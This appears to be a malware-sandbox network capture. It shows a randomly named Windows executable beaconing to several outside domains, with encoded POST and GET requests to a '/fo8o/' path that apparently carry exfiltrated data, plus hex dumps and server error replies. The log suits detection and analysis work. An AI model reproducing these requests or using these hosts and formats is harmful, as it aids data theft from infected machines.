Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49806	116.50.37.244	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:24:05.081207037 CET	1836	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 55 7a 47 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 54 69 65 78 6a 78 4c 32 4e 5a 54 68 6e 6e 4c 6d 38 30 4d 2f 75 45 57 32 34 4a 38 33 59 2f 75 7a 5a 41 38 72 41 79 36 5a 78 35 31 77 37 47 6f 59 53 59 56 49 73 2f 49 33 72 38 67 37 5a 62 6a 2f 7a 74 4f 46 34 35 65 5a 53 46 67 66 61 42 6e 50 75 52 41 4f 73 6e 32 58 74 32 56 70 38 48 75 46 47 77 38 37 38 2b 67 4e 32 42 72 79 6c 64 78 4e 46 47 67 41 5a 64 49 78 6b 61 66 67 73 71 50 41 50 61 68 70 39 4c 55 68 44 41 77 48 65 4d 57 4a 74 6d 53 4b 36 4f 65 43 44 54 68 56 6a 42 45 37 7a 4a 4a 4a [TRUNCATED] Data Ascii: UzG=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnTiexjxL2NZThnnLm80M/uEW24J83Y/uzZA8rAy6Zx51w7GoYSYVIs/I3r8g7Zbj/ztOF45eZSFgfaBnPuRAOsn2Xt2Vp8HuFGw878+gN2BryldxNFGgAZdIxkafgsqPAPahp9LUhDAwHeMWJtmSK6OeCDThVjBE7zJJJx0btYqpNJOfJCLFbfhZZiwlYB9p5dkODFcSUOpz0h/mwyF5OM906gm7ZV03J6dK1Vxfgojz6iB3wpOPRMSckz22D7oIJ1pT3kmt5OAzJQX0rpd4H1yMz8KdBrvpVD3U3zmeu86O+GkCmNwX7r8VUpMLRkY6c3P8G0fpnTUDkLQscQKtCpBC0WjC/PZq9AVPUPhBBD5/Dig7vxPgCc2pVcvipTzijVIvgKAdFC7i2pC8gbNWoNVRZMX415Goc9ACqxlKDTbGvtkaduGagDzKCszB0YP2v04KI092MQf7ousTmtftOjO7F0nipoP+ae415ShjaJt52G5Y6AFhRSUFLstJAda1ItR8M9j/L3g9nYAAaYrZcsa4vZMQvEH+ZAtHeztq24kQbanf5ovMXFmxG2hPDmBOxYxWsGXxwqxAE4UChtzmKyovtMK56OZLEgKSJviIqU3z0dUvGszLNpCkWZsAqG3JpcHhuqqwQv6sb+TG8VHQhAkXO4dCk+vc59h2hhsQCETtYQj2hDGYgZtAbx5kvk5+K7Gl1SaKXYmnS6DbpM5fRwWGzllkVCSq+ddNwmCqpgcn42aU+9x/xCJsUgMK3AP/fEJ4db0U1RRo7K/TxrU/5+U+u6hHJplkdFUrMBIcY0SOK4eWxpJ3wpdR7JATPJiykjxVFix [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49812	116.50.37.244	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:24:07.736605883 CET	521	OUT	GET /fo8o/?SFst=D27DuB&UzG=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.goldenjade-travel.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 24, 2024 08:24:09.427828074 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Tue, 24 Dec 2024 07:24:08 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49848	85.159.66.93	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:24:23.566631079 CET	778	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 55 7a 47 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 48 43 46 59 72 4d 39 61 51 75 33 56 78 63 4f 51 38 59 6d 39 5a 44 32 48 32 7a 46 43 44 33 67 72 48 6b 72 34 47 4d 3d Data Ascii: UzG=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0HCFYrM9aQu3VxcOQ8Ym9ZD2H2zFCD3grHkr4GM=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49854	85.159.66.93	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:24:26.222455978 CET	798	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 55 7a 47 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 76 4f 58 6c 37 79 54 7a 57 4a 78 6b 30 62 6d 52 59 7a 74 32 69 4e 73 77 7a 43 76 35 30 4d 4d 4a 7a 30 64 67 68 67 Data Ascii: UzG=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5vOXl7yTzWJxk0bmRYzt2iNswzCv50MMJz0dghg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49860	85.159.66.93	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:24:28.877325058 CET	1815	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 55 7a 47 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 79 33 54 69 55 4d 61 73 73 6d 71 37 43 70 61 30 37 78 54 57 4b 4d 33 48 64 70 76 79 6b 44 69 48 69 48 36 48 4c 46 69 4b 68 63 65 38 72 2b 54 30 59 77 4c 51 43 4e 33 73 52 45 68 32 64 6f 47 4d 63 6e 49 67 53 73 4a 32 4b 71 68 33 30 78 30 4b 4d 52 54 4f 4f 67 38 54 78 55 44 54 31 61 67 53 4a 65 41 49 33 38 77 37 74 69 2b 73 6b 58 6d 4d 4b 2f 55 2f 4a 4d 4f 73 39 61 51 49 70 78 55 77 32 4d 67 4d 47 39 78 67 77 68 57 74 75 72 44 7a 73 68 43 41 76 54 6d 64 50 70 2f 70 2b 44 33 6b 6f 64 32 6c [TRUNCATED] Data Ascii: UzG=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhy3TiUMassmq7Cpa07xTWKM3HdpvykDiHiH6HLFiKhce8r+T0YwLQCN3sREh2doGMcnIgSsJ2Kqh30x0KMRTOOg8TxUDT1agSJeAI38w7ti+skXmMK/U/JMOs9aQIpxUw2MgMG9xgwhWturDzshCAvTmdPp/p+D3kod2l+4YvNn23tJipx85/rQsbb3tgjLhyi4g5fehCShG7oCKTUnlOGH7C/MLlLCFBepNCelwLd4FLiBoORpWPOJduHh5uXpVuvEsxDtqlVHzP4C83V2BciD6jh4S6IfuEsb550muWnceqjpZzyLMUjqSspZqRKhzaqChBo0BSgiACGCO3NiS+toURxH1cbr4Asre4PUxzDj75BwPzFCgslxA5RscTk4WEk+bCRmOaNg30J49XkrSmC4X/iGbLstKZ/+TwHfwDWCbdQ6zApgNjvoTYeR8Hw1dGOQFcFPta/FQ2Stmx9P86MQwPjea3KS4PVUJS0mUBOaht/UPFEay20NWWi+fqfZG/d2d5TndsbuTUZ1XkAQwkco/3d1C4d3IIm85c+Isp2iJHtRPm0PCDOGoFuWr9zbjbI6mC2oo+9mtb82rZwgxWvBcEqSIoPgX68mpMXfB+GxS8wiAVIg6LcZ43JTeSUmEdWOS9n2l23pEkKGCckJdweFIbk2pBKrxDA4pPfGW5AuMvs+uRkDTNdlWS/4bXYqJV1TJ/SsX72SRqzRbaJd6Z0105PebcTu+euDbNQuFvyY1FEwvx+MGzmrDE747BBulIm5nTvGgehCJqH8jghMMedUadcLcHLEgKBZebl+VoSnbQN7j2txb1iNWNBZagGJ2RM8FxMZ [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49867	85.159.66.93	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:24:31.533456087 CET	514	OUT	GET /fo8o/?SFst=D27DuB&UzG=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.magmadokum.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 24, 2024 08:25:32.858721018 CET	194	IN	HTTP/1.0 504 Gateway Time-out Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49987	91.195.240.94	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:25:38.355437040 CET	781	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 55 7a 47 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 4d 38 45 65 4e 56 32 71 43 59 59 32 64 72 47 6d 77 6a 52 56 68 44 61 6e 55 34 4d 5a 48 58 68 58 54 42 65 30 50 30 3d Data Ascii: UzG=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pM8EeNV2qCYY2drGmwjRVhDanU4MZHXhXTBe0P0=
Dec 24, 2024 08:25:39.636188030 CET	707	IN	HTTP/1.1 405 Not Allowed date: Tue, 24 Dec 2024 07:25:39 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49988	91.195.240.94	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:25:41.005633116 CET	801	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 55 7a 47 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 76 69 33 48 77 37 49 33 32 49 4e 77 52 75 71 59 69 72 31 39 44 73 35 46 2f 48 61 6e 6e 55 34 52 42 43 41 4a 64 66 Data Ascii: UzG=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBvi3Hw7I32INwRuqYir19Ds5F/HannU4RBCAJdf
Dec 24, 2024 08:25:42.313630104 CET	707	IN	HTTP/1.1 405 Not Allowed date: Tue, 24 Dec 2024 07:25:42 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49989	91.195.240.94	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:25:43.675380945 CET	1818	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 55 7a 47 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 59 42 31 64 62 